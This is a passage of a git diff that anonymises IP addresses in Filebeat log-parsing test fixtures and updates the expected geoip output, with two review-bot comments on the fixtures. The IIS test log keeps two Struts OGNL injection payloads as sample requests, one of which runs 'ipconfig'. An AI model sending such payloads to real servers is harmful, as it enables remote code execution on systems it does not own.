res=success' +type=CRYPTO_SESSION msg=audit(1481077253.969:490): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077254.134:491): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63973 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077254.134:492): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63973 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' type=SYSCALL msg=audit(1481077254.135:493): arch=c000003e syscall=59 success=yes exit=0 a0=7f01f14443ed a1=7ffc04ef9a80 a2=7f01f1647388 a3=2 items=2 ppid=1397 pid=1399 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="unix_chkpwd" exe="/usr/sbin/unix_chkpwd" subj=system_u:system_r:chkpwd_t:s0-s0:c0.c1023 key=(null) type=EXECVE msg=audit(1481077254.135:493): argc=3 a0="/usr/sbin/unix_chkpwd" a1="some_user" a2="chkexpiry" type=CWD msg=audit(1481077254.135:493): cwd="/" type=PATH msg=audit(1481077254.135:493): item=0 name="/usr/sbin/unix_chkpwd" inode=16781526 dev=08:01 mode=0104755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:chkpwd_exec_t:s0 objtype=NORMAL type=PATH msg=audit(1481077254.135:493): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=16778495 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL -type=USER_ACCT msg=audit(1481077254.138:494): pid=1397 uid=0 auid=4294967295 
ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077254.139:495): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_AUTH msg=audit(1481077254.139:496): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=ssh res=success' -type=CRED_ACQ msg=audit(1481077254.140:497): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' +type=USER_ACCT msg=audit(1481077254.138:494): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077254.139:495): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077254.139:496): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? 
addr=216.160.83.61 terminal=ssh res=success' +type=CRED_ACQ msg=audit(1481077254.140:497): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' type=LOGIN msg=audit(1481077254.140:498): pid=1397 uid=0 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 old-auid=4294967295 auid=1000 old-ses=4294967295 ses=4 res=1 -type=USER_ROLE_CHANGE msg=audit(1481077254.211:499): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_START msg=audit(1481077254.230:500): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077254.230:501): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1397 suid=0 rport=63973 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077254.232:502): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1400 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=CRYPTO_KEY_USER msg=audit(1481077254.232:503): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1400 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRED_ACQ msg=audit(1481077254.233:504): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_LOGIN msg=audit(1481077254.255:505): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/1 res=success' -type=USER_START msg=audit(1481077254.255:506): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/1 res=success' +type=USER_ROLE_CHANGE msg=audit(1481077254.211:499): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_START msg=audit(1481077254.230:500): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' 
+type=CRYPTO_KEY_USER msg=audit(1481077254.230:501): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1397 suid=0 rport=63973 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077254.232:502): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1400 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077254.232:503): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1400 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRED_ACQ msg=audit(1481077254.233:504): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_LOGIN msg=audit(1481077254.255:505): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/1 res=success' +type=USER_START msg=audit(1481077254.255:506): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/1 res=success' type=SYSCALL msg=audit(1481077254.258:507): arch=c000003e syscall=59 success=yes exit=0 a0=7f01f7181960 a1=7ffc04ef9280 a2=7f01f717f0c0 a3=8 items=2 ppid=1400 pid=1401 auid=1000 uid=1000 gid=1001 euid=1000 suid=1000 
fsuid=1000 egid=1001 sgid=1001 fsgid=1001 tty=pts1 ses=4 comm="bash" exe="/usr/bin/bash" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=(null)
 type=EXECVE msg=audit(1481077254.258:507): argc=1 a0="-bash"
 type=CWD msg=audit(1481077254.258:507): cwd="/home/some_user"
diff --git a/filebeat/module/auditd/log/test/test.log b/filebeat/module/auditd/log/test/test.log
index b7b59daa120f..7e2b5592509d 100644
--- a/filebeat/module/auditd/log/test/test.log
+++ b/filebeat/module/auditd/log/test/test.log
@@ -1,7 +1,7 @@
 type=MAC_IPSEC_EVENT msg=audit(1485893834.891:18877201): op=SPD-delete auid=4294967295 ses=4294967295 res=1 src=192.168.2.0 src_prefixlen=24 dst=192.168.0.0 dst_prefixlen=16
 type=SYSCALL msg=audit(1485893834.891:18877199): arch=c000003e syscall=44 success=yes exit=184 a0=9 a1=7f564b2672a0 a2=b8 a3=0 items=0 ppid=1240 pid=1281 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="charon" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)
 type=USER_CMD msg=audit(1489519256.192:19600329): user pid=4151 uid=497 auid=700 ses=11988 msg='cwd="/" cmd=2F7573722F6C696236342F6E6167696F732F706C7567696E732F636865636B5F617374657269736B5F7369705F7065657273202D7020323032 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
+type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? 
res=success'
 type=TTY msg=audit(1491924063.550:1065565): tty pid=27930 uid=1000 auid=1000 ses=762 major=136 minor=0 comm="bash" data=65687F7F6563686F20746573740D76696D202F6574632F70616D2E642F70617373776F72642D617574682D61630D6D616E2070616D5F7474795F61756469740D6D616E2070616D2E640D76696D202F657463017375646F20052F70616D642E73797F7F7F7F7F2E7F6D2E642F7379092D6109617F2D61090D6D616E2070616D0D747F67726570207379737F7F7F2F7661722F6C6F09672F6D65097309207C20677265702070616D5F7474790D677265702070616D5F747479202F7661722F6C6F672F6D6573090D1B5B41017375646F200D7375646F2073750D
 type=PROCTITLE msg=audit(1451781471.394:194438): proctitle="bash"
 type=PROCTITLE msg=audit(1451781471.394:194440): proctitle=737368643A206275726E205B707269765D
diff --git a/filebeat/module/auditd/log/test/test.log-expected.json b/filebeat/module/auditd/log/test/test.log-expected.json
index a121ec916f5f..148499649881 100644
--- a/filebeat/module/auditd/log/test/test.log-expected.json
+++ b/filebeat/module/auditd/log/test/test.log-expected.json
@@ -123,7 +123,7 @@
 "event.dataset": "auditd.log",
 "event.kind": "event",
 "event.module": "auditd",
- "event.original": "type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=? res=success'",
+ "event.original": "type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe=\"/usr/sbin/sshd\" hostname=? addr=216.160.83.61 terminal=? res=success'",
 "event.outcome": "success",
 "event.type": [
 "info"
@@ -134,18 +134,17 @@
 "process.executable": "/usr/sbin/sshd",
 "process.pid": 1298,
 "service.type": "auditd",
- "source.address": "96.241.146.97",
- "source.as.number": 701,
- "source.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "source.geo.city_name": "Aldie",
+ "source.address": "216.160.83.61",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
 "source.geo.continent_name": "North America",
 "source.geo.country_iso_code": "US",
 "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.9637,
- "source.geo.location.lon": -77.6099,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "96.241.146.97",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.61",
 "user.audit.id": "4294967295",
 "user.id": "0",
 "user.saved.id": "74"
diff --git a/filebeat/module/elasticsearch/audit/test/test-audit-761.log-expected.json b/filebeat/module/elasticsearch/audit/test/test-audit-761.log-expected.json index 7b6233381c9a..372a7d9f667a 100644 --- a/filebeat/module/elasticsearch/audit/test/test-audit-761.log-expected.json +++ b/filebeat/module/elasticsearch/audit/test/test-audit-761.log-expected.json @@ -1,6 +1,6 @@ [ { - "@timestamp": "2020-04-01T13:21:06.725Z", + "@timestamp": "2020-04-01T09:21:06.725Z", "elasticsearch.audit.action": "indices:data/read/mget[shard]", "elasticsearch.audit.indices": [ ".logstash", diff --git a/filebeat/module/haproxy/log/test/default.log b/filebeat/module/haproxy/log/test/default.log index 7931d2387e2c..30f2467352d8 100644 --- a/filebeat/module/haproxy/log/test/default.log +++ b/filebeat/module/haproxy/log/test/default.log @@ -1 +1 @@ -Sep 20 15:42:59 1.2.3.4 haproxy[24551]: Connect from 1.2.3.4:40780 to 1.2.3.4:5000 (main/HTTP) +Sep 20 15:42:59 1.128.3.4 haproxy[24551]: Connect from 1.128.3.4:40780 to 1.128.3.4:5000 (main/HTTP) diff --git a/filebeat/module/haproxy/log/test/default.log-expected.json b/filebeat/module/haproxy/log/test/default.log-expected.json index 4ffaec053364..71a2523f8450 100644 --- a/filebeat/module/haproxy/log/test/default.log-expected.json +++ b/filebeat/module/haproxy/log/test/default.log-expected.json @@ -1,6 +1,6 @@ [ { - "destination.ip": "1.2.3.4", + "destination.ip": "1.128.3.4", "destination.port": 5000, "event.category": [ "network", 
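Review bot: The expected `@timestamp` of the first elasticsearch audit event shifts from `2020-04-01T13:21:06.725Z` to `2020-04-01T09:21:06.725Z` while nothing else in that hunk changes, and no edit to the input `test-audit-761.log` is visible in this diff, so the new value appears to reflect the timezone of the machine that regenerated the fixture rather than anything in the log line. If the source timestamp carries no zone and the pipeline converts it using the host's local timezone, this fixture will differ depending on where the tests run and will silently flip again on the next regeneration. Worth either regenerating under `TZ=UTC` to keep the previous value, or pinning the timezone in the module's test configuration, and stating in the commit message why a 4-hour shift is intended in a change that otherwise only anonymises IP addresses.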
@@ -16,26 +16,20 @@ "fileset.name": "log", "haproxy.frontend_name": "main", "haproxy.mode": "HTTP", - "haproxy.source": "1.2.3.4", + "haproxy.source": "1.128.3.4", "input.type": "log", "log.offset": 0, "process.name": "haproxy", "process.pid": 24551, "related.ip": [ - "1.2.3.4", - "1.2.3.4" + "1.128.3.4", + "1.128.3.4" ], "service.type": "haproxy", - "source.address": "1.2.3.4", - "source.geo.city_name": "Moscow", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "RU", - "source.geo.country_name": "Russia", - "source.geo.location.lat": 55.7527, - "source.geo.location.lon": 37.6172, - "source.geo.region_iso_code": "RU-MOW", - "source.geo.region_name": "Moscow", - "source.ip": "1.2.3.4", + "source.address": "1.128.3.4", + "source.as.number": 1221, + "source.as.organization.name": "Telstra Pty Ltd", + "source.ip": "1.128.3.4", "source.port": 40780 } ] \ No newline at end of file diff --git a/filebeat/module/haproxy/log/test/haproxy.log b/filebeat/module/haproxy/log/test/haproxy.log index 1f50b581c734..9693855efa15 100644 --- a/filebeat/module/haproxy/log/test/haproxy.log +++ b/filebeat/module/haproxy/log/test/haproxy.log 
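Review bot: Every `source.geo.*` field (city, country, location, region) is deleted from this expected document and only `source.as.number`/`source.as.organization.name` remain, so with `1.128.3.4` the haproxy fixture no longer exercises the City geoip enrichment that `1.2.3.4` previously covered; the same happens in `haproxy.log-expected.json` below. The auditd fixture in this change uses `216.160.83.61`, which its expected output shows with both `source.as.number` and the full `source.geo.*` set, so picking that address (or any other present in both test databases) here would keep City coverage for the module. If dropping the geo assertions is deliberate because `1.2.3.4` resolved to a real location, one sentence in the commit message would spare the next reader the question.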
@@ -1,4 +1,4 @@
-Jul 30 09:03:52 localhost haproxy[32450]: 1.2.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1"
+Jul 30 09:03:52 localhost haproxy[32450]: 1.128.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1"
 May 22 02:22:22 server1 haproxy[5089]: -:22222 [22/May/2021:02:22:22.222] www-https~ myapp/node2 site.domain.com 0/0/0/18/18 200 200 - - ---- 222/222/2/0/0 0/0 "OPTIONS /api/v2/app/ HTTP/1.1"
 Jun 22 12:02:53 node2 haproxy[23034]: -:47625 [22/Jun/2021:12:02:53.473] www-https~ app/app-node2 app.domain.com 0/0/1/17/18 302 291 - - ---- 1/1/0/0/0 0/0 "GET / HTTP/1.1"
 Jun 22 12:03:01 node2 haproxy[23034]: -:47445 [22/Jun/2021:12:03:01.501] www-https~ app/node16 app.domain.com 0/0/1/55/56 200 3097 - - ---- 2/2/0/0/0 0/0 "GET /app/login/ HTTP/1.1"
diff --git a/filebeat/module/haproxy/log/test/haproxy.log-expected.json b/filebeat/module/haproxy/log/test/haproxy.log-expected.json
index 9633ab571901..a53755541609 100644
--- a/filebeat/module/haproxy/log/test/haproxy.log-expected.json
+++ b/filebeat/module/haproxy/log/test/haproxy.log-expected.json
@@ -42,19 +42,13 @@ "process.name": "haproxy", "process.pid": 32450, "related.ip": [ - "1.2.3.4" + "1.128.3.4" ], "service.type": "haproxy", - "source.address": "1.2.3.4", - "source.geo.city_name": "Moscow", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "RU", - "source.geo.country_name": "Russia", - "source.geo.location.lat": 55.7527, - "source.geo.location.lon": 37.6172, - "source.geo.region_iso_code": "RU-MOW", - "source.geo.region_name": "Moscow", - "source.ip": "1.2.3.4", + "source.address": "1.128.3.4", + "source.as.number": 1221, + "source.as.organization.name": "Telstra Pty Ltd", + "source.ip": "1.128.3.4", "source.port": 38862, "url.extension": "js", "url.original": "/component---src-pages-index-js-4b15624544f97cf0bb8f.js", @@ -97,7 +91,7 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 260, + "log.offset": 262, "process.name": "haproxy", "process.pid": 5089, "related.hosts": [ @@ -145,7 +139,7 @@ "http.response.status_code": 302, "http.version": "1.1", "input.type": "log", - "log.offset": 452, + "log.offset": 454, "process.name": "haproxy", "process.pid": 23034, "related.hosts": [ @@ -193,7 +187,7 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 625, + "log.offset": 627, "process.name": "haproxy", "process.pid": 23034, "related.hosts": [ @@ -241,7 +235,7 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 806, + "log.offset": 808, "process.name": "haproxy", "process.pid": 23034, "related.hosts": [ @@ -289,7 +283,7 @@ "http.response.status_code": 403, "http.version": "1.1", "input.type": "log", - "log.offset": 983, + "log.offset": 985, "process.name": "haproxy", "process.pid": 23034, "related.hosts": [ 
@@ -337,7 +331,7 @@
 "http.response.status_code": 200,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 1163,
+ "log.offset": 1165,
 "process.name": "haproxy",
 "process.pid": 23034,
 "related.hosts": [
@@ -386,7 +380,7 @@
 "http.response.status_code": 404,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 1365,
+ "log.offset": 1367,
 "process.name": "haproxy",
 "process.pid": 23034,
 "related.hosts": [
@@ -435,7 +429,7 @@
 "http.response.status_code": 200,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 1545,
+ "log.offset": 1547,
 "process.name": "haproxy",
 "process.pid": 23034,
 "related.hosts": [
@@ -483,7 +477,7 @@
 "http.response.status_code": 404,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 1722,
+ "log.offset": 1724,
 "process.name": "haproxy",
 "process.pid": 23034,
 "related.hosts": [
diff --git a/filebeat/module/iis/access/test/test.log b/filebeat/module/iis/access/test/test.log
index c054eaf65578..ade544c55447 100644
--- a/filebeat/module/iis/access/test/test.log
+++ b/filebeat/module/iis/access/test/test.log
@@ -2,7 +2,7 @@
 #Version: 1.0
 #Date: 2018-01-01 08:09:10
 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
-2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 85.181.35.98 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123
+2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 81.2.69.143 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123
 #Software: Microsoft Internet Information Services 10.0
 #Version: 1.0
 #Date: 2018-01-01 09:10:11
@@ -12,6 +12,6 @@
 #Version: 1.0
 #Date: 2018-01-01 10:11:12
 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) cs-host sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
-2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 85.181.35.98 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789
+2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 81.2.69.143 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789
 2018-12-31 12:52:33 10.44.0.136 GET / redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0
 2018-12-31 12:52:33 10.44.0.136 GET /${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 0
diff --git a/filebeat/module/iis/access/test/test.log-expected.json b/filebeat/module/iis/access/test/test.log-expected.json
index 2e04f8ef2b66..d017c72260e3 100644
--- a/filebeat/module/iis/access/test/test.log-expected.json
+++ b/filebeat/module/iis/access/test/test.log-expected.json
@@ -12,7 +12,7 @@ "event.duration": 123000000, "event.kind": "event", "event.module": "iis", - "event.original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 85.181.35.98 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123", + "event.original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 81.2.69.143 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123", "event.outcome": "success", "event.type": [ "connection" @@ -26,21 +26,19 @@ "log.offset": 257, "related.ip": [ "127.0.0.1", - "85.181.35.98" + "81.2.69.143" ], "service.type": "iis", - "source.address": "85.181.35.98", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Berlin", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 52.4473, - "source.geo.location.lon": 13.4531, - "source.geo.region_iso_code": "DE-BE", - "source.geo.region_name": "Land Berlin", - "source.ip": "85.181.35.98", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "url.original": "/", "url.path": "/", "url.query": "q=100", @@ -74,7 +72,7 @@ "iis.access.sub_status": 0, "iis.access.win32_status": 0, "input.type": "log", - "log.offset": 709, + "log.offset": 708, "related.ip": [ "127.0.0.1" ], 
